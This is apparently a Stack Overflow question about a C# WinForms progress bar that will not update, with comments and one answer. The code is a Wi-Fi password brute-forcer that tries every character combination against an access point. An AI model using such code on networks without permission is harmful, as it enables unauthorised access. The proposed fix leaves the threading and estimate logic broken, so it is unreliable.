# C# Estimated time issue

Tags: c#, time

I have created windows form application in C# for calculating the estimated time but when I click the start button to start calculating estimated time progressbar, it does not change!

Where is the issue?

```
private delegate void SetControlPropertyThreadSafeDelegate(
        Control control,
        string propertyName,
        object propertyValue);

        public static void SetControlPropertyThreadSafe(
                Control control,
                string propertyName,
                object propertyValue)
        {
            if (control.InvokeRequired)
            {
                control.Invoke(new SetControlPropertyThreadSafeDelegate
                (SetControlPropertyThreadSafe),
                new object[] { control, propertyName, propertyValue });
            }
            else
            {
                control.GetType().InvokeMember(
                        propertyName,
                        BindingFlags.SetProperty,
                        null,
                        control,
                        new object[] { propertyValue });
            }
        }

ulong permutations = 0;
        public void bruteforce_crack(AccessPoint selectedAP)
        {
            char[] arr = output.ToCharArray();
            int max = Convert.ToInt32(numericUpDown2.Value);
            int min = Convert.ToInt32(numericUpDown1.Value);

            for (int i = min; i <= max; i++)
            {
                permutations += (ulong)Math.Pow(arr.Count(), i);
            }
            SetControlPropertyThreadSafe(label31, "Text", permutations.ToString());

            for (int i = min; i <= max; i++)
            {
                bruteforce(arr, "", 0, i, selectedAP);
            }
        }

        Stopwatch sw = new Stopwatch();
        int elapsedSec = 0;
        int estimatedTime = 0;
        int passwordLeft = 0;
        int speed = 0;
        private void bruteforce(char[] fin, String pwd, int pos, int length, AccessPoint selectedAP)
        {
            timer1.Start();

            sw.Start();

            if (pos < length)
            {
                foreach (char ch in fin)
                {
                    bruteforce(fin, pwd + ch, pos + 1, length, selectedAP);

                    elapsedSec = Convert.ToInt32(sw.Elapsed.TotalSeconds);

                    // Auth
                    AuthRequest authRequest = new AuthRequest(selectedAP);
                    bool overwrite = true;

                    if (authRequest.IsPasswordRequired)
                    {
                        if (overwrite)
                        {
                            if (authRequest.IsUsernameRequired)
                            {
                                Console.Write("\r\nPlease enter a username: ");
                                authRequest.Username = Console.ReadLine();
                            }
                            authRequest.Password = pwd;

                            if (authRequest.IsDomainSupported)
                            {
                                Console.Write("\r\nPlease enter a domain: ");
                                authRequest.Domain = Console.ReadLine();
                            }
                        }
                    }

                    selectedAP.ConnectAsync(authRequest, overwrite, OnConnectedComplete);
                }
            }
            else
            {
                try
                {
                    SetControlPropertyThreadSafe(label4, "Text", pwd);

                    SetControlPropertyThreadSafe(label5, "Text", count.ToString());
                    count++;

                    speed = count / elapsedSec;
                    SetControlPropertyThreadSafe(label23, "Text", speed + " passwords/s");

                    passwordLeft = (int)permutations - count;
                    estimatedTime = speed * (int)permutations - passwordLeft * speed;


                    SetControlPropertyThreadSafe(progressBar1, "Maximum", (int)permutations);
                    SetControlPropertyThreadSafe(progressBar1, "Value", estimatedTime);
                    SetControlPropertyThreadSafe(label30, "Text", estimatedTime.ToString() + "%");

                    if (check(selectedAP) == true && CheckForInternetConnection() == true)
                    {
                        var timeEnded = DateTime.Now;
                        SetControlPropertyThreadSafe(label4, "Text", pwd);
                        MessageBox.Show("Password is :" + pwd, "Wifi Bruteforce", MessageBoxButtons.OK, MessageBoxIcon.Information);
                        SetControlPropertyThreadSafe(label34, "Text", timeEnded.ToString());
                        sw.Stop();
                        return;
                    }
                }
                catch (Exception ex)
                {
                    MessageBox.Show(ex.Message);
                }
            }
        }
private void timer1_Tick(object sender, EventArgs e)
        {
            SetControlPropertyThreadSafe(progressBar1, "Value", estimatedTime + 1);
        }
```

Comment: Have you even tried any sort of debugging?

Comment: what is the frequency of your timer? you seem to have done some threadsafe stuff for updating the timer, but you're running all this in the UI thread so chances are it cant update

Comment: I set timer.Interval = 100 inside Form_Load

Comment: Where is the problem?

Answer (score 0):

Your progress bar code is never running.

Solution: Change your bruteforce method. move all the code from the else statement to the if statement and remove the else statement like below:

```
 private void bruteforce(char[] fin, String pwd, int pos, int length, AccessPoint selectedAP)
    {
        timer1.Start();

        sw.Start();

        if (pos < length)
        {
            foreach (char ch in fin)
            {
                bruteforce(fin, pwd + ch, pos + 1, length, selectedAP);

                elapsedSec = Convert.ToInt32(sw.Elapsed.TotalSeconds);

                // Auth
                AuthRequest authRequest = new AuthRequest(selectedAP);
                bool overwrite = true;

                if (authRequest.IsPasswordRequired)
                {
                    if (overwrite)
                    {
                        if (authRequest.IsUsernameRequired)
                        {
                            Console.Write("\r\nPlease enter a username: ");
                            authRequest.Username = Console.ReadLine();
                        }
                        authRequest.Password = pwd;

                        if (authRequest.IsDomainSupported)
                        {
                            Console.Write("\r\nPlease enter a domain: ");
                            authRequest.Domain = Console.ReadLine();
                        }
                    }
                }

                selectedAP.ConnectAsync(authRequest, overwrite, OnConnectedComplete);
            }



            try
            {
                SetControlPropertyThreadSafe(label4, "Text", pwd);

                SetControlPropertyThreadSafe(label5, "Text", count.ToString());
                count++;

                speed = count / elapsedSec;
                SetControlPropertyThreadSafe(label23, "Text", speed + " passwords/s");

                passwordLeft = (int)permutations - count;
                estimatedTime = speed * (int)permutations - passwordLeft * speed;


                SetControlPropertyThreadSafe(progressBar1, "Maximum", (int)permutations);
                SetControlPropertyThreadSafe(progressBar1, "Value", estimatedTime);
                SetControlPropertyThreadSafe(label30, "Text", estimatedTime.ToString() + "%");

                if (check(selectedAP) == true && CheckForInternetConnection() == true)
                {
                    var timeEnded = DateTime.Now;
                    SetControlPropertyThreadSafe(label4, "Text", pwd);
                    MessageBox.Show("Password is :" + pwd, "Wifi Bruteforce", MessageBoxButtons.OK, MessageBoxIcon.Information);
                    SetControlPropertyThreadSafe(label34, "Text", timeEnded.ToString());
                    sw.Stop();
                    return;
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message);
            }
        }            
    }
```